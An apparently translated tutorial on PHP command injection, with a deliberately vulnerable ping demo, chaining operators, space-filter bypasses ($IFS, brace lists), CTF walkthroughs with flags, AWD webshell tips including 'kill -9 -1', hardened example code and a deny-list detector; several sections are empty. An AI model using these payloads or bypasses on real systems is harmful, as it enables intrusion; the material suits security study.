Command Execution Vulnerability - command execution - vulnerability sites - code injection - vulnerability exploitation - joint execution - bypass (spaces, keyword filtering, variable bypass) - two ex
2022-07-04 02:52:00 【qq_ fifty-one million five hundred and fifty thousand seven hun】
Command execution
Command execution is an attack whose goal is to run arbitrary commands on the host operating system through a vulnerable application. When an application needs to call an external program to process some content, it uses functions that execute system commands.
In PHP these are system, exec, shell_exec and the like. If the user can control a parameter of the command being executed, they can inject malicious system commands into the intended command, which results in a command execution attack.
A simple example: suppose you want to create a directory. Rather than doing it in code, you know the system command is mkdir, so you create the directory by calling mkdir through one of these functions.
Example: cp /tmp/sourcefile /app/public/#{userinput}.jpg
cp copies sourcefile to the image path.
If the user's input (userinput) is aaa;cat /flag, the shell also runs cat /flag and the content of flag is read out.
Command injection is a common vulnerability class. Once a command injection vulnerability exists, an attacker can execute arbitrary commands on the target system.
Command injection attacks usually arrive through unsafe parameters passed to the program (command-line arguments, HTTP headers, cookies).
Note: command execution requires two conditions:
1. The program executes a system command.
2. The executed command, or at least one of its parameters, is controllable (or partially controllable) by the user; the place where the parameter is passed in is the place the user controls.
Command execution inherits the privileges of the web server user. That user generally has permission to write files, so the attacker can write a webshell, view private information, steal source code and even obtain a reverse shell; the impact is severe.
(The user's system commands run through the PHP code executed by the server, hence "command execution inherits the web server user's privileges".)
On Linux the highest privilege is root; the web server usually runs as www-data.
Vulnerability sites
1. Code injection: the program filters input loosely, so the user can inject code that is then executed.
High-risk functions: eval(), assert(), preg_replace() (with the /e modifier), call_user_func(), etc.
2. Command execution: a function that executes commands receives a loosely filtered parameter, which leads directly to command execution.
High-risk functions: system(), exec(), shell_exec(), passthru(), pcntl_exec(), popen(), proc_open()
Note: backticks are another name for shell_exec(), for example echo `ls`
Code injection
The program filters input loosely, so the user can inject code that is then executed.
High-risk functions: eval(), assert(), preg_replace(), call_user_func(), etc.
The difference from command execution: one executes system commands, the other executes PHP code.
Exploit
Look at a demo:
<?php
if (isset($_GET['ip'])) {
    $ip = $_GET['ip'];                    // user-controlled value, neither validated nor escaped
    echo shell_exec("ping -c 4 " . $ip);  // concatenated straight into a shell command line
} else {
    highlight_file(__FILE__);
}
Under normal circumstances you enter a host address and the result of the command is returned normally.
In the code the ip parameter is received via GET and placed directly into the command, so try appending a separator and another command:
127.0.0.1;ls -l
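Added example, not code from the original post: the demo above beside two hardened forms of the same ping endpoint. The function names ping_vulnerable, ping_escaped and ping_no_shell are my own; the fix is an allow-list check plus either shell quoting or, better, no shell at all.

```php
<?php
// Added example, not from the original post.

// Form 1 (the post's demo): the ip parameter is concatenated straight into the shell
// string, so "127.0.0.1;ls -l" also runs ls because ';' is a shell separator.
function ping_vulnerable(string $ip): string {
    return (string) shell_exec("ping -c 4 " . $ip);
}

// Form 2: allow-list the value as an IP address, then quote it with escapeshellarg().
// escapeshellarg() wraps the value in single quotes, so ';', '|', '&&', '$IFS',
// backticks and newlines reach ping as literal text even if validation is relaxed later.
function ping_escaped(string $ip): string {
    if (filter_var($ip, FILTER_VALIDATE_IP) === false) {
        return "invalid ip\n";
    }
    return (string) shell_exec("ping -c 4 " . escapeshellarg($ip));
}

// Form 3: no shell at all. The array form of proc_open() (PHP 7.4+) executes the
// program directly, so there is no command line for metacharacters to break out of.
function ping_no_shell(string $ip): string {
    if (filter_var($ip, FILTER_VALIDATE_IP) === false) {
        return "invalid ip\n";
    }
    $spec = [1 => ['pipe', 'w'], 2 => ['file', '/dev/null', 'w']];
    $proc = proc_open(['ping', '-c', '4', $ip], $spec, $pipes);
    if (!is_resource($proc)) {
        return "ping unavailable\n";
    }
    $out = stream_get_contents($pipes[1]);
    fclose($pipes[1]);
    proc_close($proc);
    return $out;
}

// is_string() rejects ip[]=... array parameters that would bypass the string checks.
if (isset($_GET['ip']) && is_string($_GET['ip'])) {
    header('Content-Type: text/plain');
    echo ping_no_shell($_GET['ip']);   // never ping_vulnerable() in real code
} else {
    highlight_file(__FILE__);
}
```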
Chained execution
Semicolon
cmd1;cmd2;cmd3
cmd1 runs first; whether cmd1 succeeds or fails, cmd2 runs after it, and when cmd2 finishes, cmd3 runs.
The three commands do not affect each other.
&&
Sometimes you want a Linux command to run only if the previous command finished successfully. That is where the logical AND operator && comes in:
cmd1 && cmd2 && cmd3
When the first command fails, && stops the following commands from running.
||
The logical OR operator (||) also chains commands, but the next command runs only if the previous one fails:
cmd1 || cmd2 || cmd3
If cmd1 fails, cmd2 runs. If cmd2 succeeds, cmd3 does not run.
|
The output of the previous command is used as the input of the next one:
cmd1 | cmd2
For example:
echo xxx | base64
Newline
%0a
%0d
Practice: actf2020exec on the BUUCTF platform
First try 127.0.0.1
127.0.0.1;ls
;cat /flag
The flag obtained is flag{3e9af367-c215-4a33-9196-4b5314327d9f}
Bypass
Space filtering
$IFS
${IFS} // add {} to delimit the variable name (separation)
$IFS$9
< // in Linux, < redirects a file into standard input
<>
{cat,flag.php} // the comma takes the place of the space; the list must be wrapped in {}
%20
%09
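To show why filtering spaces alone is not a fix, here is an added example (not from the original post) that URL-decodes a request value, reports which of the separators from the chained-execution section and the space substitutes listed above it contains, and contrasts that deny-list with an allow-list check. The constant SHELL_INJECTION_PATTERNS, the function suspicious_shell_tokens and the sample inputs are my own constructions.

```php
<?php
// Added example, not from the original post. The deny-list is useful for logging and
// alerting; the allow-list check at the bottom is the actual control.
const SHELL_INJECTION_PATTERNS = [
    'separator'   => '/[;|&`]|\$\(/',      // ; | & && || backticks $(...)
    'newline'     => '/[\r\n]/',           // %0a / %0d after URL decoding
    'ifs'         => '/\$\{?IFS\}?/',      // $IFS, ${IFS}, $IFS$9
    'redirection' => '/[<>]/',             // cat<flag, <>
    'brace_list'  => '/\{[^}]*,[^}]*\}/',  // {cat,flag.php}
    'whitespace'  => '/[\t ]/',            // %20, %09
];

// Returns the names of the patterns that match. The value is decoded once, which is
// how the web server hands a query parameter to PHP, so %0a and %09 become real bytes.
function suspicious_shell_tokens(string $raw): array {
    $value = rawurldecode($raw);
    $hits = [];
    foreach (SHELL_INJECTION_PATTERNS as $name => $regex) {
        if (preg_match($regex, $value) === 1) {
            $hits[] = $name;
        }
    }
    return $hits;
}

// Constructed sample inputs modelled on the payload shapes the post discusses.
$samples = [
    '127.0.0.1',
    '127.0.0.1;ls%20-l',
    '127.0.0.1%0acat${IFS}flag',
    '127.0.0.1|{cat,flag.php}',
    '127.0.0.1%09cat<flag',
];

foreach ($samples as $raw) {
    $hits = suspicious_shell_tokens($raw);
    // The allow-list rejects every non-IP value without knowing any bypass trick.
    $allowed = filter_var(rawurldecode($raw), FILTER_VALIDATE_IP) !== false;
    printf("%-28s deny-list: %-24s allow-list: %s\n",
        $raw, $hits ? implode(',', $hits) : 'clean', $allowed ? 'accept' : 'reject');
}
```

Only the first sample passes the allow-list; every other sample trips at least one deny-list rule, but a deny-list has to be extended for each new space substitute, while FILTER_VALIDATE_IP does not.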
Keyword filtering
Exercise:
Space filtering
Clearly a lot of things are filtered:
No error is reported (view the page source to get the flag):
flag{0af120ba-cd98-43e9-a099-3f9abac9de96}
Variable bypass
(The GXYCTF exercise above is an example of solving it with variables)
PS: additional notes
1. In an AWD competition: you cannot delete other players' webshells.
www-data and ctf/test do not belong to the same user group.
Solution: write your own webshell, connect to it with AntSword, and delete the other players' webshells through that webshell.
2. What if someone else's webshell is rewritten every second?
(If the other player's shell is written through the web page)
Write your own webshell, connect to it (making yourself a www-data user) and run kill -9 -1
If the other party is (not through the web):
Then what I should execute is:
3. Reverse shell
If the IP and port number are known: